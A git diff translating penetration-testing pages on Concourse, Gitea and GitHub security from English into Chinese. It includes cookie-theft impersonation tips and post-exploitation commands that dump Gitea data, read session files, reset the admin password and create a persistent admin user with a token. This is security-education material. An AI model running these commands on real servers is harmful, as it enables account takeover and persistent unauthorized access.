[**concourse-chart**](https://github.com/concourse/concourse-chart)。 ```bash brew install helm helm repo add concourse https://concourse-charts.storage.googleapis.com/ @@ -31,94 +28,90 @@ helm install concourse-release concourse/concourse # If you need to delete it helm delete concourse-release ``` - -After generating the concourse env, you could generate a secret and give a access to the SA running in concourse web to access K8s secrets: - +在生成 concourse 环境后,您可以生成一个密钥并授予在 concourse web 中运行的 SA 访问 K8s 密钥的权限: ```yaml echo 'apiVersion: rbac.authorization.k8s.io/v1 kind: ClusterRole metadata: - name: read-secrets +name: read-secrets rules: - apiGroups: [""] - resources: ["secrets"] - verbs: ["get"] +resources: ["secrets"] +verbs: ["get"] --- apiVersion: rbac.authorization.k8s.io/v1 kind: RoleBinding metadata: - name: read-secrets-concourse +name: read-secrets-concourse roleRef: - apiGroup: rbac.authorization.k8s.io - kind: ClusterRole - name: read-secrets +apiGroup: rbac.authorization.k8s.io +kind: ClusterRole +name: read-secrets subjects: - kind: ServiceAccount - name: concourse-release-web - namespace: default +name: concourse-release-web +namespace: default --- apiVersion: v1 kind: Secret metadata: - name: super - namespace: concourse-release-main +name: super +namespace: concourse-release-main type: Opaque data: - secret: MWYyZDFlMmU2N2Rm +secret: MWYyZDFlMmU2N2Rm ' | kubectl apply -f - ``` +### 创建管道 -### Create Pipeline +管道由一系列 [Jobs](https://concourse-ci.org/jobs.html) 组成,其中包含一个有序的 [Steps](https://concourse-ci.org/steps.html) 列表。 -A pipeline is made of a list of [Jobs](https://concourse-ci.org/jobs.html) which contains an ordered list of [Steps](https://concourse-ci.org/steps.html). +### 步骤 -### Steps +可以使用几种不同类型的步骤: -Several different type of steps can be used: +- **the** [**`task` step**](https://concourse-ci.org/task-step.html) **运行一个** [**task**](https://concourse-ci.org/tasks.html) +- the [`get` step](https://concourse-ci.org/get-step.html) 获取一个 [resource](https://concourse-ci.org/resources.html) +- the [`put` step](https://concourse-ci.org/put-step.html) 更新一个 [resource](https://concourse-ci.org/resources.html) +- the [`set_pipeline` step](https://concourse-ci.org/set-pipeline-step.html) 配置一个 [pipeline](https://concourse-ci.org/pipelines.html) +- the [`load_var` step](https://concourse-ci.org/load-var-step.html) 将一个值加载到 [local var](https://concourse-ci.org/vars.html#local-vars) 中 +- the [`in_parallel` step](https://concourse-ci.org/in-parallel-step.html) 并行运行步骤 +- the [`do` step](https://concourse-ci.org/do-step.html) 顺序运行步骤 +- the [`across` step modifier](https://concourse-ci.org/across-step.html#schema.across) 多次运行一个步骤;每种变量值组合运行一次 +- the [`try` step](https://concourse-ci.org/try-step.html) 尝试运行一个步骤,即使步骤失败也会成功 -- **the** [**`task` step**](https://concourse-ci.org/task-step.html) **runs a** [**task**](https://concourse-ci.org/tasks.html) -- the [`get` step](https://concourse-ci.org/get-step.html) fetches a [resource](https://concourse-ci.org/resources.html) -- the [`put` step](https://concourse-ci.org/put-step.html) updates a [resource](https://concourse-ci.org/resources.html) -- the [`set_pipeline` step](https://concourse-ci.org/set-pipeline-step.html) configures a [pipeline](https://concourse-ci.org/pipelines.html) -- the [`load_var` step](https://concourse-ci.org/load-var-step.html) loads a value into a [local var](https://concourse-ci.org/vars.html#local-vars) -- the [`in_parallel` step](https://concourse-ci.org/in-parallel-step.html) runs steps in parallel -- the [`do` step](https://concourse-ci.org/do-step.html) runs steps in sequence -- the [`across` step modifier](https://concourse-ci.org/across-step.html#schema.across) runs a step multiple times; once for each combination of variable values -- the [`try` step](https://concourse-ci.org/try-step.html) attempts to run a step and succeeds even if the step fails +每个 [step](https://concourse-ci.org/steps.html) 在 [job plan](https://concourse-ci.org/jobs.html#schema.job.plan) 中在其 **自己的容器** 中运行。您可以在容器内运行任何您想要的内容 _(即运行我的测试,运行这个 bash 脚本,构建这个镜像等)_。因此,如果您有一个包含五个步骤的作业,Concourse 将为每个步骤创建五个容器。 -Each [step](https://concourse-ci.org/steps.html) in a [job plan](https://concourse-ci.org/jobs.html#schema.job.plan) runs in its **own container**. You can run anything you want inside the container _(i.e. run my tests, run this bash script, build this image, etc.)_. So if you have a job with five steps Concourse will create five containers, one for each step. - -Therefore, it's possible to indicate the type of container each step needs to be run in. - -### Simple Pipeline Example +因此,可以指示每个步骤需要运行的容器类型。 +### 简单管道示例 ```yaml jobs: - - name: simple - plan: - - task: simple-task - privileged: true - config: - # Tells Concourse which type of worker this task should run on - platform: linux - image_resource: - type: registry-image - source: - repository: busybox # images are pulled from docker hub by default - run: - path: sh - args: - - -cx - - | - sleep 1000 - echo "$SUPER_SECRET" - params: - SUPER_SECRET: ((super.secret)) +- name: simple +plan: +- task: simple-task +privileged: true +config: +# Tells Concourse which type of worker this task should run on +platform: linux +image_resource: +type: registry-image +source: +repository: busybox # images are pulled from docker hub by default +run: +path: sh +args: +- -cx +- | +sleep 1000 +echo "$SUPER_SECRET" +params: +SUPER_SECRET: ((super.secret)) ``` ```bash @@ -130,26 +123,21 @@ fly -t tutorial trigger-job --job pipe-name/simple --watch # From another console fly -t tutorial intercept --job pipe-name/simple ``` +检查 **127.0.0.1:8080** 以查看管道流程。 -Check **127.0.0.1:8080** to see the pipeline flow. +### 带有输出/输入管道的 Bash 脚本 -### Bash script with output/input pipeline +可以 **将一个任务的结果保存到文件中** 并指明它是一个输出,然后将下一个任务的输入指明为上一个任务的输出。Concourse 所做的是 **在新任务中挂载上一个任务的目录,以便您可以访问上一个任务创建的文件**。 -It's possible to **save the results of one task in a file** and indicate that it's an output and then indicate the input of the next task as the output of the previous task. What concourse does is to **mount the directory of the previous task in the new task where you can access the files created by the previous task**. +### 触发器 -### Triggers +您不需要每次手动触发作业,您还可以编程使其每次运行时自动触发: -You don't need to trigger the jobs manually every-time you need to run them, you can also program them to be run every-time: +- 一段时间过去:[时间资源](https://github.com/concourse/time-resource/) +- 在主分支的新提交时:[Git 资源](https://github.com/concourse/git-resource) +- 新的 PR:[Github-PR 资源](https://github.com/telia-oss/github-pr-resource) +- 获取或推送您应用的最新镜像:[Registry-image 资源](https://github.com/concourse/registry-image-resource/) -- Some time passes: [Time resource](https://github.com/concourse/time-resource/) -- On new commits to the main branch: [Git resource](https://github.com/concourse/git-resource) -- New PR's: [Github-PR resource](https://github.com/telia-oss/github-pr-resource) -- Fetch or push the latest image of your app: [Registry-image resource](https://github.com/concourse/registry-image-resource/) - -Check a YAML pipeline example that triggers on new commits to master in [https://concourse-ci.org/tutorial-resources.html](https://concourse-ci.org/tutorial-resources.html) +查看一个在主分支新提交时触发的 YAML 管道示例,链接在 [https://concourse-ci.org/tutorial-resources.html](https://concourse-ci.org/tutorial-resources.html) {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/gitea-security/README.md b/src/pentesting-ci-cd/gitea-security/README.md index bf4f6485a..dbcf3ceeb 100644 --- a/src/pentesting-ci-cd/gitea-security/README.md +++ b/src/pentesting-ci-cd/gitea-security/README.md @@ -1,142 +1,130 @@ -# Gitea Security +# Gitea 安全 {{#include ../../banners/hacktricks-training.md}} -## What is Gitea +## 什么是 Gitea -**Gitea** is a **self-hosted community managed lightweight code hosting** solution written in Go. +**Gitea** 是一个 **自托管的社区管理轻量级代码托管** 解决方案,使用 Go 编写。 ![](<../../images/image (160).png>) -### Basic Information +### 基本信息 {{#ref}} basic-gitea-information.md {{#endref}} -## Lab - -To run a Gitea instance locally you can just run a docker container: +## 实验室 +要在本地运行 Gitea 实例,您只需运行一个 docker 容器: ```bash docker run -p 3000:3000 gitea/gitea ``` +连接到端口 3000 以访问网页。 -Connect to port 3000 to access the web page. - -You could also run it with kubernetes: - +您也可以使用 kubernetes 运行它: ``` helm repo add gitea-charts https://dl.gitea.io/charts/ helm install gitea gitea-charts/gitea ``` +## 未经身份验证的枚举 -## Unauthenticated Enumeration +- 公共仓库: [http://localhost:3000/explore/repos](http://localhost:3000/explore/repos) +- 注册用户: [http://localhost:3000/explore/users](http://localhost:3000/explore/users) +- 注册组织: [http://localhost:3000/explore/organizations](http://localhost:3000/explore/organizations) -- Public repos: [http://localhost:3000/explore/repos](http://localhost:3000/explore/repos) -- Registered users: [http://localhost:3000/explore/users](http://localhost:3000/explore/users) -- Registered Organizations: [http://localhost:3000/explore/organizations](http://localhost:3000/explore/organizations) +请注意,**默认情况下 Gitea 允许新用户注册**。这不会给新用户提供对其他组织/用户仓库的特别有趣的访问权限,但**登录用户**可能能够**查看更多的仓库或组织**。 -Note that by **default Gitea allows new users to register**. This won't give specially interesting access to the new users over other organizations/users repos, but a **logged in user** might be able to **visualize more repos or organizations**. +## 内部利用 -## Internal Exploitation +在这个场景中,我们假设你已经获得了一些对 GitHub 账户的访问权限。 -For this scenario we are going to suppose that you have obtained some access to a github account. +### 使用用户凭据/网页 Cookie -### With User Credentials/Web Cookie +如果你以某种方式已经获得了组织内某个用户的凭据(或者你窃取了一个会话 Cookie),你可以**直接登录**并检查你对哪些**仓库**拥有**权限**,你在哪些**团队**中,**列出其他用户**,以及**仓库是如何保护的**。 -If you somehow already have credentials for a user inside an organization (or you stole a session cookie) you can **just login** and check which which **permissions you have** over which **repos,** in **which teams** you are, **list other users**, and **how are the repos protected.** - -Note that **2FA may be used** so you will only be able to access this information if you can also **pass that check**. +请注意,**可能会使用 2FA**,因此你只有在能够**通过该检查**的情况下才能访问这些信息。 > [!NOTE] -> Note that if you **manage to steal the `i_like_gitea` cookie** (currently configured with SameSite: Lax) you can **completely impersonate the user** without needing credentials or 2FA. +> 请注意,如果你**设法窃取了 `i_like_gitea` Cookie**(当前配置为 SameSite: Lax),你可以**完全冒充该用户**而无需凭据或 2FA。 -### With User SSH Key +### 使用用户 SSH 密钥 -Gitea allows **users** to set **SSH keys** that will be used as **authentication method to deploy code** on their behalf (no 2FA is applied). - -With this key you can perform **changes in repositories where the user has some privileges**, however you can not use it to access gitea api to enumerate the environment. However, you can **enumerate local settings** to get information about the repos and user you have access to: +Gitea 允许**用户**设置**SSH 密钥**,该密钥将作为**代表他们部署代码的身份验证方法**(不适用 2FA)。 +使用此密钥,你可以对用户拥有某些权限的**仓库进行更改**,但是你不能使用它访问 Gitea API 来枚举环境。然而,你可以**枚举本地设置**以获取有关你有访问权限的仓库和用户的信息: ```bash # Go to the the repository folder # Get repo config and current user name and email git config --list ``` +如果用户将其用户名配置为他的 gitea 用户名,您可以访问他在 _https://github.com/\.keys_ 中设置的 **公钥**,您可以检查此内容以确认您找到的私钥是否可以使用。 -If the user has configured its username as his gitea username you can access the **public keys he has set** in his account in _https://github.com/\.keys_, you could check this to confirm the private key you found can be used. +**SSH 密钥** 也可以在仓库中设置为 **部署密钥**。任何拥有此密钥的人都将能够 **从仓库启动项目**。通常在具有不同部署密钥的服务器上,本地文件 **`~/.ssh/config`** 将提供与密钥相关的信息。 -**SSH keys** can also be set in repositories as **deploy keys**. Anyone with access to this key will be able to **launch projects from a repository**. Usually in a server with different deploy keys the local file **`~/.ssh/config`** will give you info about key is related. +#### GPG 密钥 -#### GPG Keys - -As explained [**here**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/gitea-security/broken-reference/README.md) sometimes it's needed to sign the commits or you might get discovered. - -Check locally if the current user has any key with: +如 [**这里**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/gitea-security/broken-reference/README.md) 所述,有时需要签署提交,否则您可能会被发现。 +在本地检查当前用户是否有任何密钥: ```shell gpg --list-secret-keys --keyid-format=long ``` +### 使用用户令牌 -### With User Token +有关[**用户令牌的介绍,请查看基本信息**](basic-gitea-information.md#personal-access-tokens)。 -For an introduction about [**User Tokens check the basic information**](basic-gitea-information.md#personal-access-tokens). +用户令牌可以**替代密码**来**认证**Gitea服务器[**通过API**](https://try.gitea.io/api/swagger#/)。它将对用户具有**完全访问权限**。 -A user token can be used **instead of a password** to **authenticate** against Gitea server [**via API**](https://try.gitea.io/api/swagger#/). it will has **complete access** over the user. +### 使用Oauth应用程序 -### With Oauth Application +有关[**Gitea Oauth应用程序的介绍,请查看基本信息**](./#with-oauth-application)。 -For an introduction about [**Gitea Oauth Applications check the basic information**](./#with-oauth-application). +攻击者可能创建一个**恶意Oauth应用程序**来访问接受它们的用户的特权数据/操作,这可能是网络钓鱼活动的一部分。 -An attacker might create a **malicious Oauth Application** to access privileged data/actions of the users that accepts them probably as part of a phishing campaign. +如基本信息中所述,该应用程序将对用户帐户具有**完全访问权限**。 -As explained in the basic information, the application will have **full access over the user account**. +### 绕过分支保护 -### Branch Protection Bypass +在Github中,我们有**github actions**,默认情况下会获得对仓库的**写入访问权限**的**令牌**,可以用来**绕过分支保护**。在这种情况下**不存在**,因此绕过的方式更有限。但让我们看看可以做些什么: -In Github we have **github actions** which by default get a **token with write access** over the repo that can be used to **bypass branch protections**. In this case that **doesn't exist**, so the bypasses are more limited. But lets take a look to what can be done: +- **启用推送**:如果任何具有写入权限的人可以推送到该分支,只需推送即可。 +- **白名单限制推送**:同样,如果您是此列表的一部分,则可以推送到该分支。 +- **启用合并白名单**:如果有合并白名单,您需要在其中。 +- **需要的批准大于0**:那么...您需要妥协另一个用户。 +- **限制批准给白名单用户**:如果只有白名单用户可以批准...您需要妥协另一个在该列表中的用户。 +- **撤销过期批准**:如果批准没有随着新提交而被移除,您可以劫持一个已经批准的PR来注入您的代码并合并PR。 -- **Enable Push**: If anyone with write access can push to the branch, just push to it. -- **Whitelist Restricted Pus**h: The same way, if you are part of this list push to the branch. -- **Enable Merge Whitelist**: If there is a merge whitelist, you need to be inside of it -- **Require approvals is bigger than 0**: Then... you need to compromise another user -- **Restrict approvals to whitelisted**: If only whitelisted users can approve... you need to compromise another user that is inside that list -- **Dismiss stale approvals**: If approvals are not removed with new commits, you could hijack an already approved PR to inject your code and merge the PR. +请注意**如果您是组织/仓库管理员**,您可以绕过保护。 -Note that **if you are an org/repo admin** you can bypass the protections. +### 枚举Webhooks -### Enumerate Webhooks +**Webhooks**能够**将特定的gitea信息发送到某些地方**。您可能能够**利用这种通信**。\ +然而,通常在**webhook**中设置了一个您**无法检索**的**密钥**,这将**防止**外部用户知道webhook的URL但不知道密钥来**利用该webhook**。\ +但在某些情况下,人们不是将**密钥**设置在其位置,而是将其**作为参数设置在URL中**,因此**检查URL**可能允许您**找到密钥**和其他您可以进一步利用的地方。 -**Webhooks** are able to **send specific gitea information to some places**. You might be able to **exploit that communication**.\ -However, usually a **secret** you can **not retrieve** is set in the **webhook** that will **prevent** external users that know the URL of the webhook but not the secret to **exploit that webhook**.\ -But in some occasions, people instead of setting the **secret** in its place, they **set it in the URL** as a parameter, so **checking the URLs** could allow you to **find secrets** and other places you could exploit further. +Webhooks可以在**仓库和组织级别**设置。 -Webhooks can be set at **repo and at org level**. +## 后期利用 -## Post Exploitation +### 服务器内部 -### Inside the server +如果您以某种方式设法进入运行gitea的服务器,您应该搜索gitea配置文件。默认情况下,它位于`/data/gitea/conf/app.ini` -If somehow you managed to get inside the server where gitea is running you should search for the gitea configuration file. By default it's located in `/data/gitea/conf/app.ini` +在此文件中,您可以找到**密钥**和**密码**。 -In this file you can find **keys** and **passwords**. +在gitea路径(默认:/data/gitea)中,您还可以找到有趣的信息,例如: -In the gitea path (by default: /data/gitea) you can find also interesting information like: +- **sqlite**数据库:如果gitea不使用外部数据库,它将使用sqlite数据库。 +- **会话**在会话文件夹中:运行`cat sessions/*/*/*`可以看到已登录用户的用户名(gitea也可以将会话保存在数据库中)。 +- **jwt私钥**在jwt文件夹中。 +- 该文件夹中可能找到更多**敏感信息**。 -- The **sqlite** DB: If gitea is not using an external db it will use a sqlite db -- The **sessions** inside the sessions folder: Running `cat sessions/*/*/*` you can see the usernames of the logged users (gitea could also save the sessions inside the DB). -- The **jwt private key** inside the jwt folder -- More **sensitive information** could be found in this folder +如果您在服务器内部,您还可以**使用`gitea`二进制文件**来访问/修改信息: -If you are inside the server you can also **use the `gitea` binary** to access/modify information: - -- `gitea dump` will dump gitea and generate a .zip file -- `gitea generate secret INTERNAL_TOKEN/JWT_SECRET/SECRET_KEY/LFS_JWT_SECRET` will generate a token of the indicated type (persistence) -- `gitea admin user change-password --username admin --password newpassword` Change the password -- `gitea admin user create --username newuser --password superpassword --email user@user.user --admin --access-token` Create new admin user and get an access token +- `gitea dump`将转储gitea并生成一个.zip文件。 +- `gitea generate secret INTERNAL_TOKEN/JWT_SECRET/SECRET_KEY/LFS_JWT_SECRET`将生成指定类型的令牌(持久性)。 +- `gitea admin user change-password --username admin --password newpassword`更改密码。 +- `gitea admin user create --username newuser --password superpassword --email user@user.user --admin --access-token`创建新管理员用户并获取访问令牌。 {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/gitea-security/basic-gitea-information.md b/src/pentesting-ci-cd/gitea-security/basic-gitea-information.md index e6e4d9ba3..6befd4569 100644 --- a/src/pentesting-ci-cd/gitea-security/basic-gitea-information.md +++ b/src/pentesting-ci-cd/gitea-security/basic-gitea-information.md @@ -4,104 +4,100 @@ ## Basic Structure -The basic Gitea environment structure is to group repos by **organization(s),** each of them may contain **several repositories** and **several teams.** However, note that just like in github users can have repos outside of the organization. +基本的 Gitea 环境结构是通过 **组织** 来分组仓库,每个组织可以包含 **多个仓库** 和 **多个团队**。然而,请注意,就像在 GitHub 中一样,用户可以在组织外拥有仓库。 -Moreover, a **user** can be a **member** of **different organizations**. Within the organization the user may have **different permissions over each repository**. +此外,**用户** 可以是 **不同组织的成员**。在组织内,用户可能对每个仓库拥有 **不同的权限**。 -A user may also be **part of different teams** with different permissions over different repos. +用户也可以是 **不同团队的一部分**,对不同仓库拥有不同的权限。 -And finally **repositories may have special protection mechanisms**. +最后,**仓库可能具有特殊的保护机制**。 ## Permissions ### Organizations -When an **organization is created** a team called **Owners** is **created** and the user is put inside of it. This team will give **admin access** over the **organization**, those **permissions** and the **name** of the team **cannot be modified**. +当 **组织被创建** 时,会创建一个名为 **Owners** 的团队,并将用户放入其中。该团队将提供对 **组织的管理员访问**,这些 **权限** 和团队的 **名称** **无法修改**。 -**Org admins** (owners) can select the **visibility** of the organization: +**组织管理员**(所有者)可以选择组织的 **可见性**: -- Public -- Limited (logged in users only) -- Private (members only) +- 公开 +- 限制(仅限登录用户) +- 私有(仅限成员) -**Org admins** can also indicate if the **repo admins** can **add and or remove access** for teams. They can also indicate the max number of repos. +**组织管理员** 还可以指示 **仓库管理员** 是否可以 **添加或移除团队的访问权限**。他们还可以指示最大仓库数量。 -When creating a new team, several important settings are selected: +创建新团队时,会选择几个重要设置: -- It's indicated the **repos of the org the members of the team will be able to access**: specific repos (repos where the team is added) or all. -- It's also indicated **if members can create new repos** (creator will get admin access to it) -- The **permissions** the **members** of the repo will **have**: - - **Administrator** access - - **Specific** access: +- 指定 **团队成员可以访问的组织仓库**:特定仓库(团队被添加的仓库)或所有仓库。 +- 还指示 **成员是否可以创建新仓库**(创建者将获得对其的管理员访问权限) +- **成员** 在仓库中将 **拥有的权限**: +- **管理员** 访问 +- **特定** 访问: ![](<../../images/image (118).png>) ### Teams & Users -In a repo, the **org admin** and the **repo admins** (if allowed by the org) can **manage the roles** given to collaborators (other users) and teams. There are **3** possible **roles**: +在仓库中,**组织管理员** 和 **仓库管理员**(如果组织允许)可以 **管理分配给协作者(其他用户)和团队的角色**。有 **3** 种可能的 **角色**: -- Administrator -- Write -- Read +- 管理员 +- 写入 +- 读取 ## Gitea Authentication ### Web Access -Using **username + password** and potentially (and recommended) a 2FA. +使用 **用户名 + 密码**,并可能(推荐)使用 2FA。 ### **SSH Keys** -You can configure your account with one or several public keys allowing the related **private key to perform actions on your behalf.** [http://localhost:3000/user/settings/keys](http://localhost:3000/user/settings/keys) +您可以使用一个或多个公钥配置您的帐户,允许相关的 **私钥代表您执行操作**。 [http://localhost:3000/user/settings/keys](http://localhost:3000/user/settings/keys) #### **GPG Keys** -You **cannot impersonate the user with these keys** but if you don't use it it might be possible that you **get discover for sending commits without a signature**. +您 **无法使用这些密钥冒充用户**,但如果您不使用它,可能会导致您 **因发送未签名的提交而被发现**。 ### **Personal Access Tokens** -You can generate personal access token to **give an application access to your account**. A personal access token gives full access over your account: [http://localhost:3000/user/settings/applications](http://localhost:3000/user/settings/applications) +您可以生成个人访问令牌,以 **授予应用程序访问您的帐户**。个人访问令牌对您的帐户具有完全访问权限:[http://localhost:3000/user/settings/applications](http://localhost:3000/user/settings/applications) ### Oauth Applications -Just like personal access tokens **Oauth applications** will have **complete access** over your account and the places your account has access because, as indicated in the [docs](https://docs.gitea.io/en-us/oauth2-provider/#scopes), scopes aren't supported yet: +与个人访问令牌一样,**Oauth 应用程序**将对您的帐户及其访问的地方具有 **完全访问权限**,因为如 [docs](https://docs.gitea.io/en-us/oauth2-provider/#scopes) 中所示,范围尚不支持: ![](<../../images/image (194).png>) ### Deploy keys -Deploy keys might have read-only or write access to the repo, so they might be interesting to compromise specific repos. +部署密钥可能对仓库具有只读或写入访问权限,因此它们可能对破坏特定仓库很有趣。 ## Branch Protections -Branch protections are designed to **not give complete control of a repository** to the users. The goal is to **put several protection methods before being able to write code inside some branch**. +分支保护旨在 **不将仓库的完全控制权授予用户**。目标是在能够在某些分支中编写代码之前 **设置几种保护方法**。 -The **branch protections of a repository** can be found in _https://localhost:3000/\/\/settings/branches_ +**仓库的分支保护** 可以在 _https://localhost:3000/\/\/settings/branches_ 中找到。 > [!NOTE] -> It's **not possible to set a branch protection at organization level**. So all of them must be declared on each repo. +> **无法在组织级别设置分支保护**。因此,所有保护必须在每个仓库中声明。 -Different protections can be applied to a branch (like to master): +可以对分支(例如主分支)应用不同的保护: -- **Disable Push**: No-one can push to this branch -- **Enable Push**: Anyone with access can push, but not force push. -- **Whitelist Restricted Push**: Only selected users/teams can push to this branch (but no force push) -- **Enable Merge Whitelist**: Only whitelisted users/teams can merge PRs. -- **Enable Status checks:** Require status checks to pass before merging. -- **Require approvals**: Indicate the number of approvals required before a PR can be merged. -- **Restrict approvals to whitelisted**: Indicate users/teams that can approve PRs. -- **Block merge on rejected reviews**: If changes are requested, it cannot be merged (even if the other checks pass) -- **Block merge on official review requests**: If there official review requests it cannot be merged -- **Dismiss stale approvals**: When new commits, old approvals will be dismissed. -- **Require Signed Commits**: Commits must be signed. -- **Block merge if pull request is outdated** -- **Protected/Unprotected file patterns**: Indicate patterns of files to protect/unprotect against changes +- **禁用推送**:无人可以推送到此分支 +- **启用推送**:任何有访问权限的人都可以推送,但不能强制推送。 +- **白名单限制推送**:只有选定的用户/团队可以推送到此分支(但不能强制推送) +- **启用合并白名单**:只有白名单中的用户/团队可以合并 PR。 +- **启用状态检查**:合并之前需要通过状态检查。 +- **要求批准**:指示合并 PR 之前所需的批准数量。 +- **限制批准给白名单**:指示可以批准 PR 的用户/团队。 +- **在拒绝审查时阻止合并**:如果请求更改,则无法合并(即使其他检查通过) +- **在官方审查请求时阻止合并**:如果有官方审查请求,则无法合并 +- **撤销过期的批准**:当有新提交时,旧的批准将被撤销。 +- **要求签名提交**:提交必须签名。 +- **如果拉取请求过时则阻止合并** +- **受保护/不受保护的文件模式**:指示要保护/不保护的文件模式 > [!NOTE] -> As you can see, even if you managed to obtain some credentials of a user, **repos might be protected avoiding you to pushing code to master** for example to compromise the CI/CD pipeline. +> 如您所见,即使您设法获得某个用户的凭据,**仓库可能受到保护,避免您将代码推送到主分支**,例如,以破坏 CI/CD 管道。 {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/github-security/README.md b/src/pentesting-ci-cd/github-security/README.md index cdad12b57..073d04233 100644 --- a/src/pentesting-ci-cd/github-security/README.md +++ b/src/pentesting-ci-cd/github-security/README.md @@ -2,41 +2,41 @@ {{#include ../../banners/hacktricks-training.md}} -## What is Github +## 什么是Github -(From [here](https://kinsta.com/knowledgebase/what-is-github/)) At a high level, **GitHub is a website and cloud-based service that helps developers store and manage their code, as well as track and control changes to their code**. +(来自 [这里](https://kinsta.com/knowledgebase/what-is-github/)) 从高层次来看,**GitHub是一个网站和基于云的服务,帮助开发者存储和管理他们的代码,以及跟踪和控制代码的更改**。 -### Basic Information +### 基本信息 {{#ref}} basic-github-information.md {{#endref}} -## External Recon +## 外部侦查 -Github repositories can be configured as public, private and internal. +Github 仓库可以配置为公共、私有和内部。 -- **Private** means that **only** people of the **organisation** will be able to access them -- **Internal** means that **only** people of the **enterprise** (an enterprise may have several organisations) will be able to access it -- **Public** means that **all internet** is going to be able to access it. +- **私有**意味着**只有**组织中的人才能访问它们 +- **内部**意味着**只有**企业中的人(一个企业可能有多个组织)才能访问它 +- **公共**意味着**所有互联网**用户都可以访问它。 -In case you know the **user, repo or organisation you want to target** you can use **github dorks** to find sensitive information or search for **sensitive information leaks** **on each repo**. +如果你知道**想要攻击的用户、仓库或组织**,你可以使用**github dorks**来查找敏感信息或搜索**每个仓库中的敏感信息泄露**。 ### Github Dorks -Github allows to **search for something specifying as scope a user, a repo or an organisation**. Therefore, with a list of strings that are going to appear close to sensitive information you can easily **search for potential sensitive information in your target**. +Github 允许**通过指定用户、仓库或组织作为范围来搜索某些内容**。因此,使用一系列将出现在敏感信息附近的字符串,你可以轻松地**搜索目标中的潜在敏感信息**。 -Tools (each tool contains its list of dorks): +工具(每个工具包含其 dorks 列表): -- [https://github.com/obheda12/GitDorker](https://github.com/obheda12/GitDorker) ([Dorks list](https://github.com/obheda12/GitDorker/tree/master/Dorks)) -- [https://github.com/techgaun/github-dorks](https://github.com/techgaun/github-dorks) ([Dorks list](https://github.com/techgaun/github-dorks/blob/master/github-dorks.txt)) -- [https://github.com/hisxo/gitGraber](https://github.com/hisxo/gitGraber) ([Dorks list](https://github.com/hisxo/gitGraber/tree/master/wordlists)) +- [https://github.com/obheda12/GitDorker](https://github.com/obheda12/GitDorker) ([Dorks 列表](https://github.com/obheda12/GitDorker/tree/master/Dorks)) +- [https://github.com/techgaun/github-dorks](https://github.com/techgaun/github-dorks) ([Dorks 列表](https://github.com/techgaun/github-dorks/blob/master/github-dorks.txt)) +- [https://github.com/hisxo/gitGraber](https://github.com/hisxo/gitGraber) ([Dorks 列表](https://github.com/hisxo/gitGraber/tree/master/wordlists)) -### Github Leaks +### Github 泄露 -Please, note that the github dorks are also meant to search for leaks using github search options. This section is dedicated to those tools that will **download each repo and search for sensitive information in them** (even checking certain depth of commits). +请注意,github dorks 也旨在使用 github 搜索选项查找泄露。此部分专门介绍那些将**下载每个仓库并搜索其中敏感信息**的工具(甚至检查某些深度的提交)。 -Tools (each tool contains its list of regexes): +工具(每个工具包含其正则表达式列表): - [https://github.com/zricethezav/gitleaks](https://github.com/zricethezav/gitleaks) - [https://github.com/trufflesecurity/truffleHog](https://github.com/trufflesecurity/truffleHog) @@ -47,202 +47,190 @@ Tools (each tool contains its list of regexes): - [https://github.com/awslabs/git-secrets](https://github.com/awslabs/git-secrets) > [!WARNING] -> When you look for leaks in a repo and run something like `git log -p` don't forget there might be **other branches with other commits** containing secrets! +> 当你在一个仓库中查找泄露并运行类似 `git log -p` 的命令时,不要忘记可能还有**其他分支和其他提交**包含秘密! -### External Forks +### 外部分支 -It's possible to **compromise repos abusing pull requests**. To know if a repo is vulnerable you mostly need to read the Github Actions yaml configs. [**More info about this below**](./#execution-from-a-external-fork). +可以通过**滥用拉取请求来妥协仓库**。要知道一个仓库是否脆弱,你主要需要阅读 Github Actions yaml 配置。 [**更多信息见下文**](./#execution-from-a-external-fork)。 -### Github Leaks in deleted/internal forks +### Github 在删除/内部分支中的泄露 -Even if deleted or internal it might be possible to obtain sensitive data from forks of github repositories. Check it here: +即使是删除或内部的,也可能从 github 仓库的分支中获取敏感数据。请在此查看: {{#ref}} accessible-deleted-data-in-github.md {{#endref}} -## Organization Hardening +## 组织强化 -### Member Privileges +### 成员权限 -There are some **default privileges** that can be assigned to **members** of the organization. These can be controlled from the page `https://github.com/organizations//settings/member_privileges` or from the [**Organizations API**](https://docs.github.com/en/rest/orgs/orgs). +可以为组织的**成员**分配一些**默认权限**。这些可以从页面 `https://github.com/organizations//settings/member_privileges` 或从 [**Organizations API**](https://docs.github.com/en/rest/orgs/orgs) 控制。 -- **Base permissions**: Members will have the permission None/Read/write/Admin over the org repositories. Recommended is **None** or **Read**. -- **Repository forking**: If not necessary, it's better to **not allow** members to fork organization repositories. -- **Pages creation**: If not necessary, it's better to **not allow** members to publish pages from the org repos. If necessary you can allow to create public or private pages. -- **Integration access requests**: With this enabled outside collaborators will be able to request access for GitHub or OAuth apps to access this organization and its resources. It's usually needed, but if not, it's better to disable it. - - _I couldn't find this info in the APIs response, share if you do_ -- **Repository visibility change**: If enabled, **members** with **admin** permissions for the **repository** will be able to **change its visibility**. If disabled, only organization owners can change repository visibilities. If you **don't** want people to make things **public**, make sure this is **disabled**. - - _I couldn't find this info in the APIs response, share if you do_ -- **Repository deletion and transfer**: If enabled, members with **admin** permissions for the repository will be able to **delete** or **transfer** public and private **repositories.** - - _I couldn't find this info in the APIs response, share if you do_ -- **Allow members to create teams**: If enabled, any **member** of the organization will be able to **create** new **teams**. If disabled, only organization owners can create new teams. It's better to have this disabled. - - _I couldn't find this info in the APIs response, share if you do_ -- **More things can be configured** in this page but the previous are the ones more security related. +- **基本权限**:成员将对组织仓库拥有 None/Read/write/Admin 权限。推荐使用**None**或**Read**。 +- **仓库分叉**:如果不必要,最好**不允许**成员分叉组织仓库。 +- **页面创建**:如果不必要,最好**不允许**成员从组织仓库发布页面。如果必要,可以允许创建公共或私有页面。 +- **集成访问请求**:启用后,外部协作者将能够请求访问 GitHub 或 OAuth 应用以访问该组织及其资源。通常是需要的,但如果不需要,最好禁用它。 +- _我在 API 响应中找不到此信息,如果你找到了,请分享_ +- 